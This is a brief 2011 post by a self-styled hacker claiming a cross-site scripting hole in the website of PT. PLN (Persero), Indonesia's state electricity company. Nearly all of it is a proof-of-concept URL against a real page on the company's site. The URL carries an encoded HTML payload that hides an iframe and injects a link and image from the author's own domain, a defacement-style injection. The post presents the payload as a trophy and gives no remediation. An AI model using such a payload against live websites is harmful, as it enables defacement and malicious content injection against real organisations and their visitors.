PT. PLN (Persero) Website Vulnerable to Cross Site Scripting


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Thursday, November 17th, 2011
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


{image: PT. PLN (Persero) Website XSSED by SPYRO-KiD}

PT. PLN (Persero) Website XSSED by SPYRO-KiD

POC:

http://www.pln.co.id/kontak-kami/telusur.php?nokeluhan=%22%20style=%22display:none%22%3E%3C/iframe%3E%3Cp%20align=%22center%22%3E%3Ca%20href=%22http://www.spyrozone.net%22%20target=%22_blank%22%3E%3Cimg%20src=%22http://www.spyrozone.net/playground/xssedbyspyrozone.net.png%22%20border=%220%22%3E%3C/a%3E%3C/p%3E%3Ciframe%20style=%22display:none%22%3E


//E.O.F